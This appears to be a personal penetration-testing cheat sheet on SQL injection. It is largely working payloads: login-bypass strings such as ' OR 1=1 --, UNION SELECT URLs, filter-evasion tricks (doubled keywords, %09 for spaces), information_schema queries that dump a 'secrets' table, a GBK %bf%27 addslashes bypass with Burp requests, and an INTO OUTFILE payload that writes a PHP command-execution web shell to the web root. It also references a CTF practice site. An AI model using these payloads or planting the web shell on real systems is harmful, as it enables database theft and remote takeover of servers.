SQL Injections (sqli)

Basics

http://xyz.com/hello.php?id=1 and 1=2 union select 1,2,3

Falsify the First: Read the Basic-Statement carefully. We mash a second ‘select’ statement onto the first.. to give us a New result! Using 'and 1=2' forces the first half of the query = False This will Force the query to ignore the first, and only see our 'hacker select'

Union: The 'Union' command in SQL is used to Join two separate full select statements. So we call 'select 1,2,3' just as a 'test' to see if Injection works. select 1,2,3 would give us a result of 1,2,3 (it's not actually calling any data). But, "select * from teachers where id = 20" would give us data

Functions: You can 'select' in SQL to get function information: select user() select version()

Column Counts: If your query is complaining about columns.. you can add them: select datax, dataz, 3,4,5 .. or however many you need to add (remember 3,4,5 arent giving real data)

Quote Guessing:

Sometimes the quote markings are different depending on how the query is written. ****You will need to experiment with single-quotes and double-quotes, and comments. A comment is: -- Just two dashes put together. Everything after is ignored.
Sorry but - You will need to keep guessing different selects and quotes.. till you get it! This is a labor of love ... SQL Injection!
ALWAYS use a (space) after -- COMMENT .. ex: "1=1 -- "

'OR '1' = 1
' OR '1'='1
' OR '1'='1' {
' OR '1'='1' /* 
' OR '1'='1' --
' OR 1=1' --
' OR 1=1 --
" OR 1=1 -- 
' OR 1=1 LIMIT 1 --
") OR 1=1 --       
") OR "1"="1" --   
'OR1=1#            

http://xyz.com/hello.php?id=1 AND 1=2 UNION SELECT 1,2,3
http://xyz.com/hello.php?id=1 AND 1=2 UNION SELECT 1,2,3--
http://xyz.com/hello.php?id=1 AND 1=2 'UNION SELECT 1,2,3,4'--
http://xyz.com/hello.php?id=1' AND 1=2 UNION SELECT 1,2,3,4--'
http://xyz.com/hello.php?id=1 AND 1=2' UNION SELECT "a","b"--'
http://xyz.com/hello.php?id=1' AND 1=2 UNION SELECT database(),user(),version() --
http://xyz.com/hello.php?id=1 AND 1=2' UNION SELECT "../etc/somefile","b"--'

admin'||1=1#               .. MySql '||' means 'or' .. so no space needed!
admin'||1#

Inspect:

Sometimes an Injection works, but does not show up on screen. Get familiar with your Browser 'Inspect Elements'.. You might just my find your Injection was successful!!

Trimming:

Some sites protect against hacking through trimming. If a website got smart a tried to remove anything in the query spelled 'select'? Sending the word 'selselectect' ****.. gets trimmed to 'select'!! Or, if the filter is trimming the word: 'on' We could combat this by adding another 'on' for the word 'union' .. into 'unionon' After it is trimmed, the statement still reads 'union' What if your target is trimming for 'spaces'? That could be a real headache. Try using %09 (meaning 'tab' character) instead of a space. This might get you around it!

Page is Blocking 'Space' to stop injections
Use %09 (aka: TAB) to get around it!
Error no Space? Space marks are blocked.. to prevent injections
admin' or 1=1 -- 
Using Burp:
Substitute Space with %09 (aka: 'Tab')
username=admin%27+or+1%3D1+--+&password=passwd
username=admin%27%09or%091%3D1%09--%09password=passwd

Pulling Data from other Tables

Find other tables:
SELECT table_schema, table_name FROM information_schema.TABLES 
Metadata'and 1 = 2 union select 1,table_schema, GROUP_CONCAT(table_name SEPARATOR ', ') FROM information_schema.TABLES -- 

Find columns in the 'secrets' table:
select column_name, table_name FROM information_schema.columns
Metadata'and 1 = 2 union SELECT 1,GROUP_CONCAT(column_name SEPARATOR ', '), table_name FROM information_schema.columns WHERE TABLE_NAME = 'secrets' -- 

select pwn from secrets:
Metadata'and 1 = 2 union SELECT 1,eat, GROUP_CONCAT(pwn SEPARATOR ', ') FROM secrets --

select weird column named '*'
Metadata'and 1 = 2 union SELECT 1,2,GROUP_CONCAT(`*` SEPARATOR ', ') FROM secrets -- 
Metadata'and 1 = 2 union SELECT 1,2,`*` FROM secrets WHERE `*` like 'MYDATA%' --

PHP Injections

Create a file to execute a ping:

" union select "<?php system(\"ping -c 4 10.10.10.60\");","","","","","" into outfile "/var/www/html/filename.php" #
" union select "<?php system(\"echo '<pre>'; ping -c 4 10.10.10.60\");","","","","","" into outfile "/var/www/html/filename.php" #


Make a command injection page:

" union select "<?php if (isset($_REQUEST['cmd'])){ echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; } ?><form action=<?php echo basename($_SERVER['PHP_SELF'])?>> <input type=text name=cmd size=20> <input type=submit></form>","","","","","" into outfile "/var/www/html/filename.php" #

Zixem CTF

http://www.zixem.altervista.org/SQLi/
3 - trimming
4 - columns
5 - Brute-loops: hydrabrutes
6 - Blind
8 - Spaces are blocked, select trimmed
9 - file: /etc/passwd

SQLi GBK China

Rare, but interesting: GBK Charset for China
Conflict between php and sql Implemented badly, will allow bypass for injection!
2006 method to bypass addslashes
It relies on the way MySQL will perform escaping. It will depend on the charset used by the connection. If the database driver is not aware of the charset used it will not perform the right escaping and create an exploitable situation. This exploit relies on the usage of GBK. GBK is a character set for simplified Chinese. Using the fact that the database driver and the database don't "talk" the same charset, it's possible to generate a single quote and break out of the SQL syntax to inject a payload.

Using the string \xBF' (URL-encoded as %bf%27), it's possible to get a 
single quote that will not get escaped properly. 
It's therefore possible to inject an always-true condition using 

%bf%27 or 1=1 -- and bypass the authentication.

This issue can be remediated by setting up 
the connection encoding to 'GBK' instead of using an SQL query 
(which is the source of this issue). 
Here the problem comes from 
the execution of the following query:

SET CHARACTER SET 'GBK';
It is a pretty unlikely issue for a web application but still good to know!

Burp
username=admin&password=test                   ..normal
username=admin%bf%27&password=test             ..escaped
username=admin%bf%27+or+1=1+--+&password=test  ..with injection, worked!!!

PreviousShellshock NextSQLMap

Last updated 3 years ago